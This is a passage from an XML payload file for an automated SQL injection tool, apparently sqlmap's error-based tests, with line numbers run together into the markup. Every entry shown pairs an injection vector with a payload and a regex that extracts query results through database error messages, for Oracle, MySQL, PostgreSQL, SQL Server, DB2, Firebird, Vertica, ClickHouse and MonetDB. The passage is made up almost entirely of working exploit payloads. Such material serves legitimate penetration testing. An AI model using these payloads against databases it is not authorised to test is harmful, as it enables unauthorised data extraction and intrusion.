DUAL)</payload>598</request>599<response>600<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>601</response>602<details>603<dbms>Oracle</dbms>604</details>605</test>606607<test>608<title>Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>609<stype>2</stype>610<level>2</level>611<risk>1</risk>612<clause>1,9</clause>613<where>1</where>614<vector>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>615<request>616<payload>AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>617</request>618<response>619<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>620</response>621<details>622<dbms>Oracle</dbms>623<dbms_version>>= 8.1.6</dbms_version>624</details>625</test>626627<test>628<title>Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)</title>629<stype>2</stype>630<level>2</level>631<risk>3</risk>632<clause>1,9</clause>633<where>2</where>634<vector>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>635<request>636<payload>OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')</payload>637</request>638<response>639<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>640</response>641<details>642<dbms>Oracle</dbms>643<dbms_version>>= 8.1.6</dbms_version>644</details>645</test>646647<test>648<title>Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>649<stype>2</stype>650<level>3</level>651<risk>1</risk>652<clause>1,9</clause>653<where>1</where>654<vector>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>655<request>656<payload>AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>657</request>658<response>659<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>660</response>661<details>662<dbms>Oracle</dbms>663</details>664</test>665666<test>667<title>Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)</title>668<stype>2</stype>669<level>3</level>670<risk>3</risk>671<clause>1,9</clause>672<where>2</where>673<vector>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>674<request>675<payload>OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>676</request>677<response>678<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>679</response>680<details>681<dbms>Oracle</dbms>682</details>683</test>684685<test>686<title>Oracle AND error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>687<stype>2</stype>688<level>4</level>689<risk>1</risk>690<clause>1,9</clause>691<where>1</where>692<vector>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>693<request>694<payload>AND [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>695</request>696<response>697<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>698</response>699<details>700<dbms>Oracle</dbms>701</details>702</test>703704<test>705<title>Oracle OR error-based - WHERE or HAVING clause (DBMS_UTILITY.SQLID_TO_SQLHASH)</title>706<stype>2</stype>707<level>4</level>708<risk>3</risk>709<clause>1,9</clause>710<where>2</where>711<vector>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>712<request>713<payload>OR [RANDNUM]=DBMS_UTILITY.SQLID_TO_SQLHASH(('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))</payload>714</request>715<response>716<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>717</response>718<details>719<dbms>Oracle</dbms>720</details>721</test>722723<test>724<title>Firebird AND error-based - WHERE or HAVING clause</title>725<stype>2</stype>726<level>3</level>727<risk>1</risk>728<clause>1</clause>729<where>1</where>730<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>731<request>732<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>733</request>734<response>735<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>736</response>737<details>738<dbms>Firebird</dbms>739</details>740</test>741742<test>743<title>Firebird OR error-based - WHERE or HAVING clause</title>744<stype>2</stype>745<level>4</level>746<risk>3</risk>747<clause>1</clause>748<where>2</where>749<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>750<request>751<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')</payload>752</request>753<response>754<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>755</response>756<details>757<dbms>Firebird</dbms>758</details>759</test>760761<test>762<title>MonetDB AND error-based - WHERE or HAVING clause</title>763<stype>2</stype>764<level>3</level>765<risk>1</risk>766<clause>1</clause>767<where>1</where>768<vector>AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>769<request>770<payload>AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>771</request>772<response>773<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>774</response>775<details>776<dbms>MonetDB</dbms>777</details>778</test>779780<test>781<title>MonetDB OR error-based - WHERE or HAVING clause</title>782<stype>2</stype>783<level>4</level>784<risk>3</risk>785<clause>1</clause>786<where>2</where>787<vector>OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>788<request>789<payload>OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN CODE(49) ELSE CODE(48) END)||'[DELIMITER_STOP]')</payload>790</request>791<response>792<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>793</response>794<details>795<dbms>MonetDB</dbms>796</details>797</test>798799<test>800<title>Vertica AND error-based - WHERE or HAVING clause</title>801<stype>2</stype>802<level>3</level>803<risk>1</risk>804<clause>1</clause>805<where>1</where>806<vector>AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>807<request>808<payload>AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>809</request>810<response>811<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>812</response>813<details>814<dbms>Vertica</dbms>815</details>816</test>817818<test>819<title>Vertica OR error-based - WHERE or HAVING clause</title>820<stype>2</stype>821<level>4</level>822<risk>3</risk>823<clause>1</clause>824<where>2</where>825<vector>OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::varchar||'[DELIMITER_STOP]' AS NUMERIC)</vector>826<request>827<payload>OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN BITCOUNT(BITSTRING_TO_BINARY('1')) ELSE BITCOUNT(BITSTRING_TO_BINARY('0')) END))::varchar||'[DELIMITER_STOP]' AS NUMERIC)</payload>828</request>829<response>830<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>831</response>832<details>833<dbms>Vertica</dbms>834</details>835</test>836837<test>838<title>IBM DB2 AND error-based - WHERE or HAVING clause</title>839<stype>2</stype>840<level>3</level>841<risk>1</risk>842<clause>1</clause>843<where>1</where>844<vector>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>845<request>846<payload>AND [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>847</request>848<response>849<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>850</response>851<details>852<dbms>IBM DB2</dbms>853</details>854</test>855856<test>857<title>IBM DB2 OR error-based - WHERE or HAVING clause</title>858<stype>2</stype>859<level>4</level>860<risk>3</risk>861<clause>1</clause>862<where>1</where>863<vector>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>864<request>865<payload>OR [RANDNUM]=RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>866</request>867<response>868<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>869</response>870<details>871<dbms>IBM DB2</dbms>872</details>873</test>874875<test>876<title>ClickHouse AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>877<stype>2</stype>878<level>3</level>879<risk>1</risk>880<clause>1,2,3,9</clause>881<where>1</where>882<vector>AND [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>883<request>884<payload>AND [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>885</request>886<response>887<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>888</response>889<details>890<dbms>ClickHouse</dbms>891</details>892</test>893894<test>895<title>ClickHouse OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause</title>896<stype>2</stype>897<level>4</level>898<risk>3</risk>899<clause>1,2,3,9</clause>900<where>1</where>901<vector>OR [RANDNUM]=('[DELIMITER_START]'||CAST(([QUERY]) AS String)||'[DELIMITER_STOP]')</vector>902<request>903<payload>OR [RANDNUM]=('[DELIMITER_START]'||(CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END)||'[DELIMITER_STOP]')</payload>904</request>905<response>906<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>907</response>908<details>909<dbms>ClickHouse</dbms>910</details>911</test>912913<!--914TODO: if possible, add payload for SQLite, Microsoft Access,915and SAP MaxDB - no known techniques at this time916-->917<!-- End of error-based tests - WHERE, HAVING, ORDER BY or GROUP BY clause -->918919<!-- Error-based tests - LIMIT clause -->920<test>921<title>MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)</title>922<stype>2</stype>923<level>2</level>924<risk>1</risk>925<clause>1,2,3,4,5</clause>926<where>1</where>927<vector>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')),1)</vector>928<request>929<payload>PROCEDURE ANALYSE(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')),1)</payload>930</request>931<response>932<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>933</response>934<details>935<dbms>MySQL</dbms>936<dbms_version>>= 5.1</dbms_version>937</details>938</test>939<!-- End of error-based tests - LIMIT clause -->940941<!-- Error-based tests - Parameter replace -->942<test>943<title>MySQL >= 5.5 error-based - Parameter replace (BIGINT UNSIGNED)</title>944<stype>2</stype>945<level>5</level>946<risk>1</risk>947<clause>1,2,3,9</clause>948<where>3</where>949<vector>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</vector>950<request>951<!-- These work as good as ELT(), but are longer952<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>953<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>954-->955<payload>(SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))</payload>956</request>957<response>958<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>959</response>960<details>961<dbms>MySQL</dbms>962<dbms_version>>= 5.5</dbms_version>963</details>964</test>965966<test>967<title>MySQL >= 5.5 error-based - Parameter replace (EXP)</title>968<stype>2</stype>969<level>5</level>970<risk>1</risk>971<clause>1,2,3,9</clause>972<where>3</where>973<vector>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x))</vector>974<request>975<payload>EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x))</payload>976</request>977<response>978<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>979</response>980<details>981<dbms>MySQL</dbms>982<dbms_version>>= 5.5</dbms_version>983</details>984</test>985986<test>987<title>MySQL >= 5.6 error-based - Parameter replace (GTID_SUBSET)</title>988<stype>2</stype>989<level>5</level>990<risk>1</risk>991<clause>1,2,3,9</clause>992<where>3</where>993<vector>GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>994<request>995<payload>GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>996</request>997<response>998<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>999</response>1000<details>1001<dbms>MySQL</dbms>1002<dbms_version>>= 5.6</dbms_version>1003</details>1004</test>10051006<test>1007<title>MySQL >= 5.7.8 error-based - Parameter replace (JSON_KEYS)</title>1008<stype>2</stype>1009<level>5</level>1010<risk>1</risk>1011<clause>1,2,3,9</clause>1012<where>3</where>1013<vector>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8)))</vector>1014<request>1015<payload>JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8)))</payload>1016</request>1017<response>1018<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1019</response>1020<details>1021<dbms>MySQL</dbms>1022<dbms_version>>= 5.7.8</dbms_version>1023</details>1024</test>10251026<test>1027<title>MySQL >= 5.0 error-based - Parameter replace (FLOOR)</title>1028<stype>2</stype>1029<level>2</level>1030<risk>1</risk>1031<clause>1,2,3,9</clause>1032<where>3</where>1033<vector>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</vector>1034<request>1035<!-- These work as good as ELT(), but are longer1036<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1037<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1038-->1039<payload>(SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)</payload>1040</request>1041<response>1042<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1043</response>1044<details>1045<dbms>MySQL</dbms>1046<dbms_version>>= 5.0</dbms_version>1047</details>1048</test>10491050<test>1051<title>MySQL >= 5.1 error-based - Parameter replace (UPDATEXML)</title>1052<stype>2</stype>1053<level>4</level>1054<risk>1</risk>1055<clause>1,2,3,9</clause>1056<where>3</where>1057<vector>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1]))</vector>1058<request>1059<!-- These work as good as ELT(), but are longer1060<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1061<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1062-->1063<payload>(UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM1]))</payload>1064</request>1065<response>1066<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1067</response>1068<details>1069<dbms>MySQL</dbms>1070<dbms_version>>= 5.1</dbms_version>1071</details>1072</test>10731074<test>1075<title>MySQL >= 5.1 error-based - Parameter replace (EXTRACTVALUE)</title>1076<stype>2</stype>1077<level>2</level>1078<risk>1</risk>1079<clause>1,2,3,9</clause>1080<where>3</where>1081<vector>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')))</vector>1082<request>1083<!-- These work as good as ELT(), but are longer1084<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]')))</payload>1085<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>1086-->1087<payload>(EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')))</payload>1088</request>1089<response>1090<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1091</response>1092<details>1093<dbms>MySQL</dbms>1094<dbms_version>>= 5.1</dbms_version>1095</details>1096</test>10971098<test>1099<title>PostgreSQL error-based - Parameter replace</title>1100<stype>2</stype>1101<level>2</level>1102<risk>1</risk>1103<clause>1,2,3,9</clause>1104<where>3</where>1105<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1106<request>1107<payload>(CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1108</request>1109<response>1110<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1111</response>1112<details>1113<dbms>PostgreSQL</dbms>1114</details>1115</test>11161117<test>1118<title>PostgreSQL error-based - Parameter replace (GENERATE_SERIES)</title>1119<stype>2</stype>1120<level>5</level>1121<risk>1</risk>1122<clause>1,2,3,9</clause>1123<where>3</where>1124<vector>(CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC))</vector>1125<request>1126<payload>(CAST('[DELIMITER_START]'||(SELECT 1 FROM GENERATE_SERIES([RANDNUM],[RANDNUM],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)::text||'[DELIMITER_STOP]' AS NUMERIC))</payload>1127</request>1128<response>1129<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1130</response>1131<details>1132<dbms>PostgreSQL</dbms>1133</details>1134</test>11351136<test>1137<title>Microsoft SQL Server/Sybase error-based - Parameter replace</title>1138<stype>2</stype>1139<level>3</level>1140<risk>1</risk>1141<clause>1,3</clause>1142<where>3</where>1143<vector>(CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')))</vector>1144<request>1145<payload>(CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')))</payload>1146</request>1147<response>1148<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1149</response>1150<details>1151<dbms>Microsoft SQL Server</dbms>1152<dbms>Sybase</dbms>1153</details>1154</test>11551156<test>1157<title>Microsoft SQL Server/Sybase error-based - Parameter replace (integer column)</title>1158<stype>2</stype>1159<level>4</level>1160<risk>1</risk>1161<clause>1,3</clause>1162<where>3</where>1163<vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>1164<request>1165<payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>1166</request>1167<response>1168<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1169</response>1170<details>1171<dbms>Microsoft SQL Server</dbms>1172<dbms>Sybase</dbms>1173</details>1174</test>11751176<test>1177<title>Oracle error-based - Parameter replace</title>1178<stype>2</stype>1179<level>3</level>1180<risk>1</risk>1181<clause>1,3</clause>1182<where>3</where>1183<vector>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</vector>1184<request>1185<payload>(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)</payload>1186</request>1187<response>1188<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1189</response>1190<details>1191<dbms>Oracle</dbms>1192</details>1193</test>11941195<test>1196<title>Firebird error-based - Parameter replace</title>1197<stype>2</stype>1198<level>4</level>1199<risk>1</risk>1200<clause>1,3</clause>1201<where>3</where>1202<vector>(SELECT [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'))</vector>1203<request>1204<payload>(SELECT [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]'))</payload>1205</request>1206<response>1207<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1208</response>1209<details>1210<dbms>Firebird</dbms>1211</details>1212</test>12131214<test>1215<title>IBM DB2 error-based - Parameter replace</title>1216<stype>2</stype>1217<level>4</level>1218<risk>1</risk>1219<clause>1,3</clause>1220<where>3</where>1221<vector>RAISE_ERROR('70001','[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')</vector>1222<request>1223<payload>RAISE_ERROR('70001','[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM SYSIBM.SYSDUMMY1)||'[DELIMITER_STOP]')</payload>1224</request>1225<response>1226<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1227</response>1228<details>1229<dbms>IBM DB2</dbms>1230</details>1231</test>1232<!-- End of error-based tests - Parameter replace -->12331234<!-- Error-based tests - ORDER BY, GROUP BY clause -->1235<test>1236<title>MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (BIGINT UNSIGNED)</title>1237<stype>2</stype>1238<level>5</level>1239<risk>1</risk>1240<clause>2,3</clause>1241<where>1</where>1242<vector>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</vector>1243<request>1244<payload>,(SELECT [RANDNUM] FROM (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))x)</payload>1245</request>1246<response>1247<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1248</response>1249<details>1250<dbms>MySQL</dbms>1251<dbms_version>>= 5.5</dbms_version>1252</details>1253</test>12541255<test>1256<title>MySQL >= 5.5 error-based - ORDER BY, GROUP BY clause (EXP)</title>1257<stype>2</stype>1258<level>5</level>1259<risk>1</risk>1260<clause>2,3</clause>1261<where>1</where>1262<vector>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))x)))s)</vector>1263<request>1264<payload>,(SELECT [RANDNUM] FROM (SELECT EXP(~(SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]','x'))x)))s)</payload>1265</request>1266<response>1267<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1268</response>1269<details>1270<dbms>MySQL</dbms>1271<dbms_version>>= 5.5</dbms_version>1272</details>1273</test>12741275<test>1276<title>MySQL >= 5.6 error-based - ORDER BY, GROUP BY clause (GTID_SUBSET)</title>1277<stype>2</stype>1278<level>5</level>1279<risk>1</risk>1280<clause>2,3</clause>1281<where>1</where>1282<vector>,GTID_SUBSET(CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM])</vector>1283<request>1284<payload>,GTID_SUBSET(CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'),[RANDNUM])</payload>1285</request>1286<response>1287<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1288</response>1289<details>1290<dbms>MySQL</dbms>1291<dbms_version>>= 5.6</dbms_version>1292</details>1293</test>12941295<test>1296<title>MySQL >= 5.7.8 error-based - ORDER BY, GROUP BY clause (JSON_KEYS)</title>1297<stype>2</stype>1298<level>5</level>1299<risk>1</risk>1300<clause>2,3</clause>1301<where>1</where>1302<vector>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]')) USING utf8))))x)</vector>1303<request>1304<payload>,(SELECT [RANDNUM] FROM (SELECT JSON_KEYS((SELECT CONVERT((SELECT CONCAT('[DELIMITER_START]',(SELECT (ELT([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]')) USING utf8))))x)</payload>1305</request>1306<response>1307<grep>[DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]</grep>1308</response>1309<details>1310<dbms>MySQL</dbms>1311<dbms_version>>= 5.7.8</dbms_version>1312</details>1313</test>13141315<test>1316<title>MySQL >= 5.0 error-based - ORDER BY, GROUP BY clause (FLOOR)</title>1317<stype>2</stype>1318<level>4</level>1319<risk>1</risk>1320<clause>2,3</clause>1321<where>1</where>1322<vector>,(SELECT 1 FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM 